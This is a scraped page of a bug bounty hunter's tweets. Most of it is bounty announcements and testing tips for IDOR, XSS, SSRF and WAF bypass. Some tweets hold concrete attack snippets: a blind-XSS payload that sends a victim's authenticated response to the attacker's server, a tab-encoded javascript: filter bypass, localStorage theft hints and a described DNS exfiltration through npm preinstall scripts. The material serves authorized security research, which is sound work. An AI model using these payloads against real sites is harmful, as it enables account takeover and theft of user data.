Moblig
@moblig_
Followers
6,937
Following
151
Media
65
Statuses
528
#1 Hacker at BugCon LHE Mexico 2021 & 2022 | Top Ranked in H1 Mexico Leaderboard 2021, 2022, 2023 | Offensive Security Engineer | Tweets are my own
127.0.0.1
Joined August 2021
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
LINGORM FILL
• 1287288 Tweets
BRICS
• 475648 Tweets
John Kelly
• 169390 Tweets
Sara
• 93516 Tweets
#tusaş
• 79666 Tweets
ボボステ
• 57037 Tweets
#JO1ANNX
• 39590 Tweets
Hopkins
• 38033 Tweets
ドラフト
• 37655 Tweets
Türk Havacılık
• 35021 Tweets
#편도행_해적선_6년째_순항중
• 32264 Tweets
Şehitlerimize Allah'tan
• 28869 Tweets
サクラコ
• 28430 Tweets
Uzay Sanayii AŞ
• 28138 Tweets
HAPPY ATEEZ DAY
• 25004 Tweets
Penarol
• 21184 Tweets
Medina
• 13334 Tweets
$ORANGE
• 10130 Tweets
Pinned Tweet
Yay, I was awarded a $16,300 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
🎉🎉🎉
Tip: Even if an asset asks for authentication, fuzz for endpoints using ffuf, I found an unauthenticated API that allowed me to retrieve sensitive information!
42
91
1K
$15k+ Worth of IDORs in the past couple of months; it takes a lot of manual verification, but use this regex in BurpSuite in order to filter out potential parameters:
(?i)\b\w*id\b(?!\w)\s*=\s*("[^"]*"|'[^']*'|[^&\s}]*)
#bugbountytips
#CyberSecurity
34
358
1K
$10,000 for RCE through Dependency Confusion, this time on one of my first submissions in
@intigriti
🙌
I spent a whole month learning and developing a custom tool using Next.js, this helped me identify and exploit the RCE.
Of course, I also used:
37
73
704
Yay, I was awarded a $10,000 bounty on
@Hacker0x01
! For a Critical Severity IDOR.
Tip:
1) In-depth knowledge of the program, lots of manual testing
2) Learning to master the 'Autorize' extension for Burp
Automated & manual testing🤝
#bugbountytip
#hackerone
26
72
687
Yay, I was awarded a $4,500 bounty on
@Hacker0x01
!
Tip:
Target had a /?back= parameter, but payloads like javascript://alert(1) did not work.
Exploited using the following with URL-encoded ASCII tab characters:
%09Jav%09ascript:alert(document.domain)
#bugbountytips
#bugbounty
19
141
654
Some fun & unexpected bugs I found recently👇
1. Authentication Bypass by setting session cookie value to 'null'
2. Plain text credentials in JS files expose clients' PII
Haven't found a write-up about the null cookie approach before, and the exposed credentials, just, wow...
21
100
627
I often find IDORs by searching in JS Files for interesting endpoints, but how do I automate this while also performing manual hunting?🤔
#bugbountytips
I mostly use my custom
@trick3st
workflow for finding unique domains & secrets in JS files, here is how it works👇
1/4
15
148
586
Yay, I was awarded a $10,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
#bugbountytip
DOM XSS to Admin Account Takeover - No CORS policy so I was able to send authenticated requests on behalf of the victim and send the response back to my server.
👇
15
34
458
$5,000 for 5 IDORS on the same asset!
All manual findings, although for some of these I used the ‘Reflection’ extension in Burp in order to find more parameters vulnerable to IDOR
#bugbountytips
#hackerone
14
57
430
Feels good to be back!🙌
Using this beauty again to bypass the fix for an XSS to ATO:
%09Jav%09ascript:alert(1)
#bugbountytips
#togetherwehitharder
#hackerone
PS. If anyone is going to
@defcon
and wants to meet, I'll be in Vegas Aug 6-10! :)
Attending
@Hacker0x01
recharge too.
12
38
445
Yay, I was awarded a $4,000 bounty on
@Hacker0x01
!
For XSS to ATO
Instead of a
#bugbountytip
, here is the code snippet used to check the user-supplied input in this specific parameter, who can tell me what the problem here was, and what a potential bypass would look like?
14
27
444
I was awarded $7,666 for a Critical XSS
Reflected XSS, but no particular sensitive data was exposed.
Here is how I was able to escalate to account takeover👇
#bugbountytips
17
74
418
$4,000 for Bypassing WAF
Tip: Whenever an asset is protected by a WAF, enumerate and investigate subdomains and IP Addresses, sometimes you’ll find dev or staging environments which are exact copies of production.
-> WAF
https://69.420.69.420:443
- No WAF
16
72
408
Yay, I was awarded a $4,500 bounty on
@Hacker0x01
!
XSS to ATO through exposed CSRF Tokens
Tip:
If cookies are HTTP only, search for exposed CSRF tokens, you can append them to your CSRF PoC: xhr.setRequestHeader("X-Csrf-Token", "3983xn9n");
#bugbountytips
Read first comment👇
9
68
373
I got a $1,160 bounty for an IDOR that exposed all Machine Learning Models in Gitlab.
This was found using the Autorize extension in Burp, go check out the disclosed report!
#bugbountytips
12
40
383
Yay, I was awarded a $4,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
I think we all guessed what this was for, right?
6
20
352
Yay, I was awarded a $4,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
For Reflected XSS to Account Takeover
Tip: When cookies are HTTP only go for localStorage -- alert(JSON.stringify(localStorage));
5
47
301
Yay, I was awarded a $2,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
This reponse time is literally every BugHunter's dream😮
Bug: IDOR by manually adding the parameter "user_id" to the JSON request
#bugbountytips
11
18
275
I know they were pissed after bypassing the fix for the third time lol
Needless to say, they removed the asset from scope
#bugbounty
15
12
268
An API is calling your own records like this?
-> GET /v1/transactions/all
See if the response contains and object with an ID and reference it directly
-> GET /v1/transactions/813
If you get a 200 OK, check if you can access any record ID for an IDOR!
#bugbountytips
6
67
246
Yay, I was awarded a $1,500 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
SSRF by appending /param?url=
Access to internal resources but escalated to ATO by pointing the param to an XSS payload
/param?url=
6
34
229
Yay, I was awarded a $2,000 bounty on
@Hacker0x01
!
Tip: If user IDs are predictable, try different features in the platform that expose user info, in my case I could add people to a team, therefore I could guess all user IDs with intruder and expose their info
#bugbountytips
8
17
222
Yay, I was awarded a $3,000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Blind XSS through Support Chat leads to ATO, forging requests on behalf of the victim using Fetch & sending the response to the attacker server (payload below👇🏻👇🏻👇🏻)
8
27
187
Yay, I was awarded a $1,500 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
First time seeing an SSRF lead to an account takeover by itself, I might consider a writeup for this one because of its weird nature, also some kind words :)
7
6
181
Yay, I was awarded a $2,500 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
First one of the year and last report regarding Log4j!
4
4
104
One of the first critical bounties of my career was because of The Wayback Machine and the amazing resources they have and these idiots trying to take it down because of unrelated politics? Amazing👍🏻
The Internet archive has and is suffering from a devastating attack We have been launching several highly successful attacks for five long hours and, to this moment, all their systems are completely down.
second round | New attack
09/10/2024 Duration 6 hours
283
234
915
4
9
114
You get a cute ‘Thank you’ note when reporting vulnerabilities to a company valued at 1.5 Trillion Dollars🥰
#bugbounty
6
2
87
A quote from my 10k XSS report, this is why you have to use irrefutable facts when trying to demonstrate impact:
I got $66000 once for an XSS. The impact to the business and its users is the important thing in a report and not the bug itself.
17
24
511
2
6
80
4) Build the payload using the GraphQL query:
(payload doesn't fit in a tweet)
3
7
80
"><img src="x"onerror="fetch('
https://target/x',{method:'get',credentials:'include',headers:{'Content-Type':'application/json'}}).then(response
=> response.text()).then(data =>{var xhr=new XMLHttpRequest();('POST','
https://myserver/a');xhr.send(data);});">
6
14
72
Getting a duplicate on
@Hacker0x01
hurts, but getting a duplicate on a bug worth 10k is actually depressing😔
#bugbounty
5
0
68
Well this was an interesting one🤔
$500 Bounty from the
@mozilla
Bug Bounty!
Same tip as my last bounty, FFUF and keep updating your wordlists!
I have no idea how to redeem this though lol
#bugbountytips
7
5
64
Getting this message from a program is great, but getting a compliment from a triager hits different lol
#bugbounty
5
1
58
$1,500 for a vulnerability initially marked as “Not Applicable” by a triager, the tip today isn’t a technical one, rather than an advice — Triagers do not have the last word, always ask for the client to be consulted and provide irrefutable evidence!
#bugbountytips
#bugbounty
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on
@Hacker0x01
and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd
#bugbounty
4
1
48
3
3
56
I just found and reported 3 vulnerabilities affecting the same product used by 3 different companies, 2 of them have been accepted as High on
@Hacker0x01
and the 3rd marked as "Not Applicable" on Bugcrowd 😂This is why I never hack on Bugcrowd
#bugbounty
4
1
48
@Bhavinology
1. Single web app in scope so a lot of manual work and learning all the features
2. Once I find a vulnerable parameter I search for similar params using Reflected Parameters extension or with Logger using the regex\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
2
9
46
The PoC URL required an SID every time, so I had to create a Python script that would generate a new SID and append it to the PoC URL, the final payload looked like this
(`<base64-encoded-code>`));
And the code used inside the atob function
2
0
45
@0xuchiha_MRX
Crawl using Burp + navigating web app manually, also use gau and filter out for URLs paths that only have query parameters, you can always find potential parameters there, if an ID is easily guessable try for IDOR
1
5
43
In this case, the CSRF token was exposed through a non-HTTP cookie and also the DOM, they expired after 24 hours so plenty of time to abuse them. I was initially paid 625 for this report, and after review, I was given the rest of the 4,500
1
0
36
@ThisIsDK999
@intigriti
Great question here!
The main difference I found was not putting your payload directly in the preinstall parameter of your package.json, instead use 'node preinstall.json' and put your payload in the preinstall.json file, I also hex encoded the data and used DNS exfiltration
2
2
34
Nothing better than receiving personalized private invites! Makes you want to invest some extra effort on the program.
@Hacker0x01
1
1
33
The XSS could only retrieve non-HTTP cookies, so here is what I did:
1) I found a GraphQL endpoint (POST /graphql_service), that retrieved the user's auth token. So, how can I steal the token?
2) I tried transforming the POST query to a GET query in order to use it in my payload
2
1
28
The second part grabs the results & searches JS files using getjs, the results are then passed to Cariddi which crawls the URLs & scans for endpoints, secrets, API keys, file extensions, tokens, and more. Linkfinder is used to extract endpoints & params from the JS files.
3/4
3
0
28
@Hacker0x01
Although the right move, it's also sad for the Russian bug hunters and companies who have to endure the consequences of their leader's decisions.
0
1
27
The first part does a thorough subdomain scan of the desired targets, using multiple sources like Github & Shodan and tools like subfinder, vita & assetfinder. It then goes deeper by performing level-deep subdomain scans with puredns
2/4
1
1
27
I now have a working GET GraphQL query, but how can I expose the response that includes the auth token?
3) I found that the site also has a CORS misconfig, so I can send requests on behalf of the victim and receive the response on my server
2
1
26
I’ll never understand why programs don’t fix Critical/P1 vulnerabilities for months, like, I’m tired of wasting hours investigating and exploiting vulnerabilities, writing a good report just to get a duplicate on Criticals🙄
#bugbounty
2
2
26
Haven't seen a new Clear Verified program in a WHILE, yet new VDPs every month. Companies seem to prefer volume over quality now. Here is an interesting fact from H1 customers:
More and more BBPs programs leaving/closing at a crazy rate
New VDPs every month
Almost 300 Reports in less than a week for this new VDP
We are doomed.
33
15
230
2
2
24
1st Place second year in a row in
@Mercadolibre
live hacking event! Gracias
@BugCON
🥳 por el evento!
#bugbounty
3
5
22
Completely wrong take, you are actually head hunted if you perform well in Bug Bounty. I've interviewed candidates who do well in Bug Bounty and they perform better than Certs collectors🤷🏻
@sk1dd13
Been saying this for a while now dude. It's the most true statement ever. Some people think that bug bounties look great on a resume, but the truth is, recruiters don't give a flying shit about them. They don't consider it experience.
Not my personal opinion. Just straight facts
13
1
20
3
2
23
@heyAbdulsamad
@Hacker0x01
If the default is a 200 page instead of a 404, you can use the -fs option to filter HTTP response size. Just look at the response size of that 200 page and use -fs 2456 for example
2
7
22
Extra note: The 2 environments had bi-directional synchronization, so everything a user modified or posted on dev would immediately be reflected on prod and viceversa. So injecting a payload in dev would reflect on prod, but injecting a payload in prod was blocked by the WAF
2
0
20
Pisses me off that programs can get away with this at
@Hacker0x01
, what are they going to come with up next? Signing up for an account is considered High attack complexity?😂
4
4
48
2
0
19
Yay, I was awarded a $800 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Second time I was able to leak an entire platform user base including PII. /users/5020 -> 403 Forbidden /users/5020.json -> 200 OK
1
3
19
@gonzxph
You can try different bypasses for internal assets like 127.1 instead of 127.0.0.1, also try URL shortners that point to
http://localhost,
if none of those work, host a XSS payload which extract localstorage and cookies, there is always juicy information there
0
1
15
I hate it when you work for hours investigating and escalating an XSS just for a stupid program to tell you "We take XSS as Medium severity, we have the final word" fucking put it on your brief then so I don't waste my time🙄
#bugbounty
0
0
14
@ibug___
@theXSSrat
@stokfredrik
Bypassing the 403 is a vuln by itself but it has to be accompanied by a good PoC, example: accessing sensitive files stored in the server like web.config or nginx.conf. I personally like this 403 Bypass script because I can add my own patterns
1
2
14
@ManasH4rsh
Cherish that feeling you get from your first bounty, you'll never experience the same again!
0
0
13
Proud to end the year off by being the
#1
Hacker in Mexico’s
@Hacker0x01
leaderboard for 15 months straight!
#TogetherWeHitHarder
0
1
12
@voorivex
@Hacker0x01
You are absolutely correct, this was an oversight on my part as I took the code after the fix was pushed, the original code did not match for whitespace characters, only for the javascript string, this was the original line:
var n = decodeURI(t.modal.getUrlParam('onmodalexit'));
0
1
13
Does anyone know if you can invite a collaborator to a report in a private program, even if the collaborator is not part of the program?
#bugbounty
8
1
13
@_jayesh_7
Check out this Tweet
Yay, I was awarded a $10,000 bounty on
@Hacker0x01
! For a Critical Severity IDOR.
Tip:
1) In-depth knowledge of the program, lots of manual testing
2) Learning to master the 'Autorize' extension for Burp
Automated & manual testing🤝
#bugbountytip
#hackerone
26
72
687
0
0
11
@MiniMjStar
@Hacker0x01
Check out this guide:
If you have any more doubts after reading this, let me know
1
0
11
@disnhau
@rhetoric_URBAN
@Hacker0x01
Exactly, created a script using the eval function, the script called my XSS hunter server which stole cookies and sensitive data
1
0
10
If it wasn’t because of private bug bounty programs I would now have 15+ CVE’s to my name, bounty amounts are very good but sometimes I think CVE’s would be better, what would you prefer?
CVE's
36
Bounties 💸
183
3
0
11
Do you actually think
#ethicalhacking
has gotten to the point where we are a problem for blackhats? Like, do they wake up in the morning and say "Man I hate bug bounty hunters"
#bugbounty
Yes
54
No
62
I'm a black hat
25
4
0
9
Context:
The vulnerability allows an attacker to view private Github/Gitlab repos, even if Gitlab is vehind VPN
All reports were evaluated by triagers, not by the company.
The bugcrowd triager closed it 3 minutes after I reported and just gave me the standard "N/A" message
3
0
10
@GhimireVeshraj
Fight this, open a mediation request. We shouldn't be getting fucked over by inexperienced triagers
0
0
8
@Burp_Suite
Can this be an optional feature that you can turn on/off? I find it similar to how Caido queues requests and I hate that
2
0
5
I think some people are missing the point here, it's not about having a clean sheet and no N/A's, I had a couple myself; many new bug bounty hunters 'spray and pray,' sending many low-quality reports hoping one hits. This wastes a lot of effort and will later reflect badly on u
Bug bounty programs are not ur personal training ground to spam with NA reports until u learn. Go play CTFs, do portswigger's and pentesterlab's exercises. Build ur own website and break it. There are a billion ways to learn without wasting everyone's time.
10
13
143
3
0
9
@0099gaurav
But Autorize sends 3 requests by default, 1 is the original, 2 is the modified request, 3 is the unauthenticated request. You must be configuring it wrong
1
0
8